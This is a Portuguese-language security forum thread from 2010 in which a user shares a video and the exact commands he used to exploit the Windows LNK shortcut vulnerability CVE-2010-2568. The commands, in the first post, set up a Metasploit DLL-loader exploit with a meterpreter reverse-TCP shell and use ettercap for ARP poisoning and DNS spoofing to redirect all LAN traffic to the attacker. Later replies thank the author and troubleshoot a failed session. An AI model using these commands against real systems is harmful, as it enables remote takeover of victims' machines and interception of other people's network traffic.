Vulnerabilidade de atalho nos sistemas operacionais Windows das versões Windows XP SP2 e SP3, Server 2003 SP2, Vista SP1 e SP2, Server 2008 SP2 e R2, e Windows 7, que permite a execução de códigos maliciosos através dos arquivos de atalho fabiano.LNK ou fabiano.PIF que e direcionado para um DLL malicioso.
Maiores informações em:
http://www.microsoft.com/technet/sec.../MS10-046.mspx
http://www.microsoft.com/technet/sec...y/2286198.mspx
O que eu fiz?
Usei o metasploit para preparar o ataque fazendo um servidor e o ettercap fazendo um MITM e direcionando todo trafego da minha rede local para minha maquina.
Comandos:
use windows/browser/ms10_046_shortcut_icon_dllloader
set LHOST 192.168.1.4
set PAYLOAD windows/meterpreter/reverse_tcp
EditorDeTexto /usr/share/ettercap/etter.dns
*.* A SeuIP
ettercap -T -q -P dns_spoof -M ARP // //
Sobre o Vídeo:
Formato: AVI
Tamanho: 12.6 MB
Duração: 4:45 min
Autor: Fabiano Matias aka Bhior
Musica: Cachimbo da paz - Gabriel o Pensador
Baixar:
Online:
Referencia:Upando...
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568
http://www.osvdb.org/66387
http://www.microsoft.com/technet/sec.../MS10-046.mspx
http://www.microsoft.com/technet/sec...y/2286198.mspx
http://adrenaline.com.br/seguranca/n...r-malware.html
Resultados 1 a 10 de 11
-
07 Sep 2010, 16:54 #1Membro
- Data de Ingresso
- Feb 2009
- Localização
- Belo Horizonte
- Posts
- 213
Vulnerabilidade de atalho do Windows - CVE-2010-2568 - Metasploit + Ettercap
Então DEUS disse: "tar -zxvf universo-0.1.tar.gz ; cd universo-0.1 ; ./configure --nodeps && make && make install
Blog: http://remote-execution.blogspot.com
Se você gosta tanto do Windows, porque você não compra ele?
-
07 Sep 2010, 20:12 #2Wannabe
- Data de Ingresso
- Sep 2009
- Localização
- Virtual World
- Posts
- 763
Grande Bhior, mais umas de suas ótimas aulas.
Obrigado por disponibilizar.*_________________
< areax@hotmail.com >
*------------------------
*********\*..,__,
**********\*(oo)______
***********.(__)*****)\
**************||------|| *
-
13 Sep 2010, 17:28 #3Moderador
- Data de Ingresso
- Jun 2007
- Localização
- Sao Paulo
- Posts
- 1.727
Interessante!
Vou baixar e assistir, obrigado! =D
-
15 Sep 2010, 21:46 #4Administrador
- Data de Ingresso
- Nov 2005
- Localização
- 127.0.0.1
- Posts
- 9.699
Eu assisti...mto interessante e bem explicada. Vlw cara...abraços!
-
20 Sep 2010, 12:30 #5Newbie
- Data de Ingresso
- Mar 2008
- Localização
- Brasília
- Posts
- 97
Vlw ! Baixando pra conferir.
Seraph
-
20 Sep 2010, 13:46 #6Membro
- Data de Ingresso
- Dec 2008
- Localização
- cidade do sol
- Posts
- 174
Muito boa... valew...
-
29 Sep 2010, 13:43 #7Membro
- Data de Ingresso
- Sep 2006
- Posts
- 200
ola bhior faço tudo bem mas nao tenho acesso ao pc eu fiz testes na maquina virtual ele abre a pasta mas o meterpreter nao abre a sesao
pode me ajudar? obrigada
-
29 Sep 2010, 13:43 #8Membro
- Data de Ingresso
- Sep 2006
- Posts
- 200
a outra coisa como faço para registar em seu blog?
-
29 Sep 2010, 13:52 #9Membro
- Data de Ingresso
- Sep 2006
- Posts
- 200
fica dizendo isto ---> sending unc redirect to meu ip
-
29 Sep 2010, 22:40 #10Membro
- Data de Ingresso
- Feb 2009
- Localização
- Belo Horizonte
- Posts
- 213
Ola tatiana,
Exite algumas probabilidades, a primeira e do firewall esta rodando na maquina alvo, o windows alvo ja possuir a pack de correção da vulnerabilidade, má configuração da rede entre as maquinas ou má configuração do ataque.
A respeito do blog, era so um teste, vou abrir-lo.
AbraçosEntão DEUS disse: "tar -zxvf universo-0.1.tar.gz ; cd universo-0.1 ; ./configure --nodeps && make && make install
Blog: http://remote-execution.blogspot.com
Se você gosta tanto do Windows, porque você não compra ele?
Responder com Citação
